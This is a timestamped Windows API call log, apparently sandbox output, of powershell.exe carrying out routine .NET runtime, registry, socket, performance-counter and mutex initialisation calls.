	[0899.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c8bd940 | out: lpFileInformation=0x1c8bd940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0899.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c8bd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0899.236] SetErrorMode (uMode=0x1) returned 0x1
	[0899.236] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a8
	[0899.236] GetFileType (hFile=0x3a8) returned 0x1
	[0899.236] SetErrorMode (uMode=0x1) returned 0x1
	[0899.236] GetFileType (hFile=0x3a8) returned 0x1
	[0899.239] GetFileSize (in: hFile=0x3a8, lpFileSizeHigh=0x1c8bd938 | out: lpFileSizeHigh=0x1c8bd938*=0x0) returned 0x622a
	[0899.239] ReadFile (in: hFile=0x3a8, lpBuffer=0x2f9d6b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8bd858, lpOverlapped=0x0 | out: lpBuffer=0x2f9d6b8*, lpNumberOfBytesRead=0x1c8bd858*=0x1000, lpOverlapped=0x0) returned 1
	[0899.249] ReadFile (in: hFile=0x3a8, lpBuffer=0x2f9d6b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8bd388, lpOverlapped=0x0 | out: lpBuffer=0x2f9d6b8*, lpNumberOfBytesRead=0x1c8bd388*=0x1000, lpOverlapped=0x0) returned 1
	[0899.250] ReadFile (in: hFile=0x3a8, lpBuffer=0x2f9d6b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8bd388, lpOverlapped=0x0 | out: lpBuffer=0x2f9d6b8*, lpNumberOfBytesRead=0x1c8bd388*=0x1000, lpOverlapped=0x0) returned 1
	[0899.251] ReadFile (in: hFile=0x3a8, lpBuffer=0x2f9d6b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8bd388, lpOverlapped=0x0 | out: lpBuffer=0x2f9d6b8*, lpNumberOfBytesRead=0x1c8bd388*=0x1000, lpOverlapped=0x0) returned 1
	[0899.251] ReadFile (in: hFile=0x3a8, lpBuffer=0x2f9d6b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8bd388, lpOverlapped=0x0 | out: lpBuffer=0x2f9d6b8*, lpNumberOfBytesRead=0x1c8bd388*=0x1000, lpOverlapped=0x0) returned 1
	[0899.254] ReadFile (in: hFile=0x3a8, lpBuffer=0x2f9d6b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8bd4c8, lpOverlapped=0x0 | out: lpBuffer=0x2f9d6b8*, lpNumberOfBytesRead=0x1c8bd4c8*=0x1000, lpOverlapped=0x0) returned 1
	[0899.254] ReadFile (in: hFile=0x3a8, lpBuffer=0x2f9d6b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8bd348, lpOverlapped=0x0 | out: lpBuffer=0x2f9d6b8*, lpNumberOfBytesRead=0x1c8bd348*=0x22a, lpOverlapped=0x0) returned 1
	[0899.254] ReadFile (in: hFile=0x3a8, lpBuffer=0x2f9d6b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8bd3e8, lpOverlapped=0x0 | out: lpBuffer=0x2f9d6b8*, lpNumberOfBytesRead=0x1c8bd3e8*=0x0, lpOverlapped=0x0) returned 1
	[0899.255] CloseHandle (hObject=0x3a8) returned 1
	[0899.255] CoTaskMemAlloc (cb=0x20c) returned 0x1b8e1b10
	[0899.256] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b8e1b10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0899.256] CoTaskMemFree (pv=0x1b8e1b10) 
	[0899.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8bd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0899.256] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.256] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bdb48 | out: TokenHandle=0x1c8bdb48*=0x3a8) returned 1
	[0899.257] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.257] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bdb48 | out: TokenHandle=0x1c8bdb48*=0x370) returned 1
	[0899.258] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.258] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd8e8 | out: TokenHandle=0x1c8bd8e8*=0x3ac) returned 1
	[0899.259] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bdb48 | out: TokenHandle=0x1c8bdb48*=0x350) returned 1
	[0899.259] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bdb48 | out: TokenHandle=0x1c8bdb48*=0x378) returned 1
	[0899.266] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.266] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd7c8 | out: TokenHandle=0x1c8bd7c8*=0x37c) returned 1
	[0900.005] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.006] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd7c8 | out: TokenHandle=0x1c8bd7c8*=0x380) returned 1
	[0900.018] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384
	[0900.018] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0900.021] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.021] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd798 | out: TokenHandle=0x1c8bd798*=0x38c) returned 1
	[0900.028] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.028] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd798 | out: TokenHandle=0x1c8bd798*=0x390) returned 1
	[0900.667] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.667] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd6d8 | out: TokenHandle=0x1c8bd6d8*=0x3b0) returned 1
	[0900.675] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.675] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd6d8 | out: TokenHandle=0x1c8bd6d8*=0x374) returned 1
	[0900.679] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.679] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bdd18 | out: TokenHandle=0x1c8bdd18*=0x394) returned 1
	[0900.764] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8bbdd8 | out: phkResult=0x1c8bbdd8*=0x3b8) returned 0x0
	[0900.764] RegQueryValueExW (in: hKey=0x3b8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c8bbd5c, lpData=0x0, lpcbData=0x1c8bbd58*=0x0 | out: lpType=0x1c8bbd5c*=0x1, lpData=0x0, lpcbData=0x1c8bbd58*=0xe) returned 0x0
	[0900.764] CoTaskMemAlloc (cb=0x12) returned 0x1b8f3680
	[0900.764] RegQueryValueExW (in: hKey=0x3b8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c8bbd2c, lpData=0x1b8f3680, lpcbData=0x1c8bbd28*=0xe | out: lpType=0x1c8bbd2c*=0x1, lpData="Client", lpcbData=0x1c8bbd28*=0xe) returned 0x0
	[0900.764] CoTaskMemFree (pv=0x1b8f3680) 
	[0900.764] RegCloseKey (hKey=0x3b8) returned 0x0
	[0901.180] CoTaskMemAlloc (cb=0xcd0) returned 0x1b911080
	[0901.181] RasEnumConnectionsW (in: param_1=0x1b911080, param_2=0x1c8bdd6c, param_3=0x1c8bdd68 | out: param_1=0x1b911080, param_2=0x1c8bdd6c, param_3=0x1c8bdd68) returned 0x0
	[0901.186] CoTaskMemFree (pv=0x1b911080) 
	[0901.192] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c8bdb78 | out: lpWSAData=0x1c8bdb78) returned 0
	[0901.201] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x404
	[0901.206] setsockopt (s=0x404, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0901.206] closesocket (s=0x404) returned 0
	[0901.206] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x404
	[0901.208] setsockopt (s=0x404, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0901.208] closesocket (s=0x404) returned 0
	[0901.214] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.214] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd3f8 | out: TokenHandle=0x1c8bd3f8*=0x404) returned 1
	[0901.589] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.589] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd3f8 | out: TokenHandle=0x1c8bd3f8*=0x408) returned 1
	[0901.616] GetCurrentProcessId () returned 0x17f4
	[0901.964] CoTaskMemAlloc (cb=0x204) returned 0x269f80
	[0901.964] GetComputerNameW (in: lpBuffer=0x269f80, nSize=0x2fcc130 | out: lpBuffer="XDUWTFONO", nSize=0x2fcc130) returned 1
	[0901.964] CoTaskMemFree (pv=0x269f80) 
	[0901.965] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8bd8d8 | out: phkResult=0x1c8bd8d8*=0x40c) returned 0x0
	[0901.965] RegQueryValueExW (in: hKey=0x40c, lpValueName="Library", lpReserved=0x0, lpType=0x1c8bd85c, lpData=0x0, lpcbData=0x1c8bd858*=0x0 | out: lpType=0x1c8bd85c*=0x1, lpData=0x0, lpcbData=0x1c8bd858*=0x1c) returned 0x0
	[0901.965] CoTaskMemAlloc (cb=0x20) returned 0x1b910b20
	[0901.965] RegQueryValueExW (in: hKey=0x40c, lpValueName="Library", lpReserved=0x0, lpType=0x1c8bd82c, lpData=0x1b910b20, lpcbData=0x1c8bd828*=0x1c | out: lpType=0x1c8bd82c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c8bd828*=0x1c) returned 0x0
	[0901.965] CoTaskMemFree (pv=0x1b910b20) 
	[0901.965] RegQueryValueExW (in: hKey=0x40c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c8bd85c, lpData=0x0, lpcbData=0x1c8bd858*=0x0 | out: lpType=0x1c8bd85c*=0x4, lpData=0x0, lpcbData=0x1c8bd858*=0x4) returned 0x0
	[0901.966] RegQueryValueExW (in: hKey=0x40c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c8bd860, lpData=0x1c8bd85c, lpcbData=0x1c8bd858*=0x4 | out: lpType=0x1c8bd860*=0x4, lpData=0x1c8bd85c*=0x1, lpcbData=0x1c8bd858*=0x4) returned 0x0
	[0901.966] RegQueryValueExW (in: hKey=0x40c, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c8bd85c, lpData=0x0, lpcbData=0x1c8bd858*=0x0 | out: lpType=0x1c8bd85c*=0x4, lpData=0x0, lpcbData=0x1c8bd858*=0x4) returned 0x0
	[0901.966] RegQueryValueExW (in: hKey=0x40c, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c8bd860, lpData=0x1c8bd85c, lpcbData=0x1c8bd858*=0x4 | out: lpType=0x1c8bd860*=0x4, lpData=0x1c8bd85c*=0x137a, lpcbData=0x1c8bd858*=0x4) returned 0x0
	[0901.966] RegCloseKey (hKey=0x40c) returned 0x0
	[0901.969] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8bd898 | out: phkResult=0x1c8bd898*=0x40c) returned 0x0
	[0901.969] RegQueryValueExW (in: hKey=0x40c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c8bd81c, lpData=0x0, lpcbData=0x1c8bd818*=0x0 | out: lpType=0x1c8bd81c*=0x4, lpData=0x0, lpcbData=0x1c8bd818*=0x4) returned 0x0
	[0901.969] RegQueryValueExW (in: hKey=0x40c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c8bd820, lpData=0x1c8bd81c, lpcbData=0x1c8bd818*=0x4 | out: lpType=0x1c8bd820*=0x4, lpData=0x1c8bd81c*=0x3, lpcbData=0x1c8bd818*=0x4) returned 0x0
	[0901.969] RegQueryValueExW (in: hKey=0x40c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c8bd81c, lpData=0x0, lpcbData=0x1c8bd818*=0x0 | out: lpType=0x1c8bd81c*=0x4, lpData=0x0, lpcbData=0x1c8bd818*=0x4) returned 0x0
	[0901.969] RegQueryValueExW (in: hKey=0x40c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c8bd820, lpData=0x1c8bd81c, lpcbData=0x1c8bd818*=0x4 | out: lpType=0x1c8bd820*=0x4, lpData=0x1c8bd81c*=0x20000, lpcbData=0x1c8bd818*=0x4) returned 0x0
	[0901.969] RegQueryValueExW (in: hKey=0x40c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c8bd81c, lpData=0x0, lpcbData=0x1c8bd818*=0x0 | out: lpType=0x1c8bd81c*=0x3, lpData=0x0, lpcbData=0x1c8bd818*=0xaa) returned 0x0
	[0901.969] RegQueryValueExW (in: hKey=0x40c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c8bd81c, lpData=0x2fcf420, lpcbData=0x1c8bd818*=0xaa | out: lpType=0x1c8bd81c*=0x3, lpData=0x2fcf420*, lpcbData=0x1c8bd818*=0xaa) returned 0x0
	[0901.973] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0901.977] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c8bd7d0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0901.978] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x414
	[0901.980] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x28b0000
	[0901.982] VirtualQuery (in: lpAddress=0x28b0000, lpBuffer=0x1c8bd7c8, dwLength=0x30 | out: lpBuffer=0x1c8bd7c8*(BaseAddress=0x28b0000, AllocationBase=0x28b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0901.982] LocalFree (hMem=0x1b8f4600) returned 0x0
	[0901.982] RegCloseKey (hKey=0x40c) returned 0x0
	[0901.985] GetVersionExW (in: lpVersionInformation=0x1c8bc7a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c8bc7a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0901.986] GetVersionExW (in: lpVersionInformation=0x1c8bc770*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c8bc770*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0901.987] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd00f0, cbSid=0x1c8bd7b0 | out: pSid=0x2fd00f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8bd7b0) returned 1
	[0901.989] CreateMutexW (lpMutexAttributes=0x2fd02f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0901.991] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0901.994] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0902.002] GetCurrentProcessId () returned 0x17f4
	[0902.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17f4) returned 0x418
	[0902.004] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd6c0, lpExitTime=0x1c8bd6b8, lpKernelTime=0x1c8bd6b0, lpUserTime=0x1c8bd6a8 | out: lpCreationTime=0x1c8bd6c0, lpExitTime=0x1c8bd6b8, lpKernelTime=0x1c8bd6b0, lpUserTime=0x1c8bd6a8) returned 1
	[0902.004] CloseHandle (hObject=0x418) returned 1
	[0902.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f4) returned 0x418
	[0902.005] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.005] CloseHandle (hObject=0x418) returned 1
	[0902.005] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7f4) returned 0x418
	[0902.006] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.006] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.007] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8bd6a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8bd6a8*=0x41c) returned 1
	[0902.008] CloseHandle (hObject=0x41c) returned 1
	[0902.008] CloseHandle (hObject=0x418) returned 1
	[0902.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1668) returned 0x418
	[0902.008] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.008] CloseHandle (hObject=0x418) returned 1
	[0902.009] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x1668) returned 0x418
	[0902.009] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.009] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.009] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8bd6a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8bd6a8*=0x41c) returned 1
	[0902.009] CloseHandle (hObject=0x41c) returned 1
	[0902.009] CloseHandle (hObject=0x418) returned 1
	[0902.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14f0) returned 0x418
	[0902.009] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.009] CloseHandle (hObject=0x418) returned 1
	[0902.009] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x14f0) returned 0x418
	[0902.009] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.009] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.009] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8bd6a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8bd6a8*=0x41c) returned 1
	[0902.010] CloseHandle (hObject=0x41c) returned 1
	[0902.010] CloseHandle (hObject=0x418) returned 1
	[0902.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf2c) returned 0x418
	[0902.010] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.010] CloseHandle (hObject=0x418) returned 1
	[0902.010] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf2c) returned 0x418
	[0902.010] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.010] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.010] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8bd6a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8bd6a8*=0x41c) returned 1
	[0902.082] CloseHandle (hObject=0x41c) returned 1
	[0902.082] CloseHandle (hObject=0x418) returned 1
	[0902.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b8) returned 0x418
	[0902.082] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.082] CloseHandle (hObject=0x418) returned 1
	[0902.082] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x9b8) returned 0x418
	[0902.082] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.082] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.083] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8bd6a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8bd6a8*=0x41c) returned 1
	[0902.083] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.083] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.083] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.083] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.083] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.084] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.084] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738 | out: lpCreationTime=0x1c8bd750, lpExitTime=0x1c8bd748, lpKernelTime=0x1c8bd740, lpUserTime=0x1c8bd738) returned 1
	[0902.084] ReleaseMutex (hMutex=0x40c) returned 1
	[0902.279] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd17e8, cbSid=0x1c8bd7b0 | out: pSid=0x2fd17e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8bd7b0) returned 1
	[0902.279] CreateMutexW (lpMutexAttributes=0x2fd19a0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.279] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd2610, cbSid=0x1c8bd7b0 | out: pSid=0x2fd2610*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8bd7b0) returned 1
	[0902.280] CreateMutexW (lpMutexAttributes=0x2fd27c8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.280] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd3448, cbSid=0x1c8bd7b0 | out: pSid=0x2fd3448*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8bd7b0) returned 1
	[0902.280] CreateMutexW (lpMutexAttributes=0x2fd3600, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.280] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fd4278, cbSid=0x1c8bd7b0 | out: pSid=0x2fd4278*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8bd7b0) returned 1
	[0902.280] CreateMutexW (lpMutexAttributes=0x2fd4430, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x40c
